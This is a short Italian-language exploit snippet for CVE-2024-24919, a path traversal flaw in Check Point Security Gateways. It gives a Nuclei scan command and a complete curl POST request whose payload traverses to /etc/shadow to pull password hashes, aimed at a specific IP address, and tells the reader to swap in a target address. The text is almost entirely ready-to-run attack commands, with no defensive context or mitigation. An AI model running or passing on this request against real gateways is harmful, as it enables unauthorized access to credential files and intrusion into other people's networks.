
Exploit per CVE-2024-24919 che mira ai Check Point Security Gateways tramite path traversal per leggere /etc/shadow, con template Nuclei e comando curl per test automatizzati.

nuclei -list chick.txt -t CVE-2024-24919.yaml
Sostituisci con l'indirizzo IP di destinazione, e questo comando tenterà di accedere al file /etc/shadow, che contiene gli hash delle password.
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'
